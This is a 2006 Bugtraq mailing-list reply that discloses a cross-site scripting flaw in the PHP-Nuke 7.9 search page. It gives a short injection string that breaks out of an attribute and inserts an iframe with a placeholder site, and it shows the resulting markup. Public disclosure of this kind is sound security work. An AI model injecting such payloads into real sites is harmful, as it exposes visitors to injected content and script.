Bugtraq mailing list archives

Re: PHP-Nuke <= 7.9 Search XSS Vulnerability

From: try_og () hotmail com
Date: 9 Jun 2006 01:26:11 -0000

"><iframe src="http://[site]/ 

will become:
<iframe src="http://[site]/";>

"><"

will become:
<"">

This way, you can put html (maybe even more) on the page you are searching from...

Current thread:

PHP-Nuke <= 7.9 Search XSS Vulnerability try_og (Jun 08)
- Re: PHP-Nuke <= 7.9 Search XSS Vulnerability Paul Laudanski (Jun 13)
- <Possible follow-ups>
- Re: PHP-Nuke <= 7.9 Search XSS Vulnerability try_og (Jun 09)